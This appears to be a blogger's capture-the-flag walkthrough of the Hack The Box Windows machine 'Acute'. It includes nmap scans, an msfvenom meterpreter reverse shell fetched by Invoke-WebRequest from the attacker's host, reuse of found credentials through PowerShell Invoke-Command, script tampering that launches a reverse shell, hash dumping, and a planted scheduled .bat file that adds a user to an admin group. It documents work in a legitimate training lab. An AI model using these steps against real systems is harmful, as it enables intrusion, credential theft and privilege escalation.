rootđź’€muzec-sec:~#

Hack. Sleep. Repeat

View on GitHub

image

Now that is a tough machine man it pain full of pain but interesting at last without wasting to much of time let jump in already.

We always start with an nmap scan…..

nmap -p- --min-rate 10000 -oA nmap/allports -v IP

# Nmap 7.91 scan initiated Wed Feb 16 14:29:52 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.27s latency).
Not shown: 65534 filtered ports
PORT    STATE SERVICE
443/tcp open  https

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb 16 14:31:33 2022 -- 1 IP address (1 host up) scanned in 101.32 seconds

Now that is strange just one port which is 443 HTTPS .

nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145

# Nmap 7.91 scan initiated Wed Feb 16 14:29:26 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.29s latency).

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_ssl-date: 2022-02-16T16:29:37+00:00; +2h59m36s from scanner time.
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2h59m35s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 16 14:30:03 2022 -- 1 IP address (1 host up) scanned in 36.87 seconds

Now that is interesting let add atsserver.acute.local 10.10.14.145 to /etc/hosts now let see what we have running on the webpage.

image

Now what do we have let try looking around to see what we can get maybe hint or anything that can be useful to further our enumeration forawrd.

image

Now we can use that to create some userlist maybe it can useful.

Awallace
Chall
Edavies
Imonks
Jmorgan
Lhopkins

image

Now that New Starter Forms look interesting let click on it.

image

So we downloaded a doc file let check it and see what we have in it.

image

Seems like a checklist interesting right now that is promising.

image

Arrange for the new starter to meet with other staff in the department as appropriate. This could include the Head of Department and/or other members of the appointee’s team. Complete the remote training.

image

Now that is cool i click on the remote which i got transfer to a staff webpage which is a Windows PowerShell Web Access ahhh nice.

image

Since we already know the default password for new staff which is Password1! let try to get the computer name back to the doc let check if we have anything hidden on it with exiftool.

image

Now we have the Computer name let the password with all the userlist we compile.

image

I was able to get in with edavies now time to enumerate the system more to see what we can loot. So the best thing o do now is to get a proper reverse shell back to our terminal.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.145]
└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.52 LPORT=1337 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes

Now we use msfvenom to generate a payload file to get a reverse shell now let find writable folder on the target.

image

Found a writable folder let transfer our payload.

image

Invoke-WebRequest "http://10.10.14.52:8000/shell.exe" -OutFile "shell.exe"

Now let start our listener before executing our payload.

image

Now let click on run and execute the payload on the target.

image

Now that we a meterpreter shell let use the screenshare command to see what has taken place on the target

image

We can confirm the streaming on browser.

image

image

image

Now we just need to create the same object and use Invoke-Command to execute commands has user imonks

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

image

Now boom we can execute command has imonks now let enumerate more.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users} -credential $cred

We have more users to eumerate let hit it.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users/imonks/desktop} -credential $cred

Boom we have user.txt also seems we have a powershell script let cat it to see what we have inside.

image

Now that scripts look promising seems it a script that contain jmorgan password we can see it in the object it possible to execute command has jmorgan if we run the script. So what we need to do is edit Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds remove Get-Volume and add a path to our reverse shell executable file.

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock{((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\rev.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred

image

Now we can execute it with invoke-command again.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1} -credential $cred

image

Now back to check our listener.

image

Boom we shell has jmorgan cool now let check which localgroup jmorgan is on.

image

Now we know jmorgan is part of administrator group we can dump the hashes.

image

Now let crack the administrator hash .

image

But the issue is when i try to use on the administrator it a dead end so let try password reuse on each users we know we have no access to yet use powershell script just like the first time setting object and using the invoke-command .

A flashback if i can remember we found some new users ATSSERVER why not let give it a try with the usernames.

image

$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

Boom work for user awallace more enumeration now.

image

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"} -credential $cred

Now that folder look strange and interesting keepmeon let check what we have in it.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"/keepmeon} -credential $cred

image

Now we have a bat file let cat to see what the keepmeon.bat doing.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred

Now that seems like a job keep running every 5min just like a cronjob in linux probably these one is scheduled to run every 5 min which is cool i guess.

REM This is run every 5 minutes. For Lois use ONLY

@echo off

 for /R %%x in (*.bat) do (

 if not "%%x" == "%~0" call "%%x"

)

Let me break it down any file ending with .bat would run every 5 min since we are in the keepmeon folder so it possible to create a payload in a bat format which can give access to lois now back to the doc file we got first.

image

**Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **

Now let add user awallace to the group of site_admin and wait for 5min to confirm it.

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}

image

Now we can confirm if user awallace is now part of site_admin group.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {net group site_admin} -credential $cred

Now we are part of site_admin group time to get the root.txt flag.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users/administrator/desktop} -credential $cred

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /users/administrator/desktop/root.txt} -credential $cred

ahhhh finally we are done.

Greeting From Muzec



Back To Home